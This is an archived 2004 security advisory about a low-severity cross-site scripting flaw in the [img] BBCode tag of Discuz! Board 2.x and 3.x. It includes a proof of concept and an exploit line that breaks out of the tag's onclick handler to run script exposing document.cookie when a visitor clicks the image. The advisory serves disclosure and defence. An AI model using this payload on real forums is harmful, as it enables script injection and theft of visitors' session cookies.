TUCoPS :: Web BBS :: etc :: hack3700.htm

Discuz! Board XSS
Possible Cross Site Scripting in Discuz! Board 



Advisory Name:Possible Cross Site Scripting in Discuz! Board

Release Date: Feb 5,2004

Application: Discuz! Board

Version Affected: 2.x , 3.x

Platform: PHP

Severity: Low

Discover: Cheng Peng Su(apple_soup_at_msn.com)

Vendor URL: http://www.discuz.com/ 

################################################

Proof Of Concept:

   A thread including:

       [img]http://a.gif');(xss code);a=escape('a[/img] 

   will be 

       src="http://a.gif');(xss code);a=escape=('a" border="0" onload="if(this.width>screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window';}" onmouseover="if(this.resized) this.style.cursor='hand';" onclick="if(this.resized) window.open('http://site/pic.gif');(xss code);a=escape('a');">



   So there will be a red 'x' instead of a normal pic,if visitor click the red 'x',the code will be executed.

   I think you know why i add " ;a=escape('a " after the xss code.



Exploit:

   [img]http://a.gif');alert(document.cookie);a=escape=('a[/img]

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH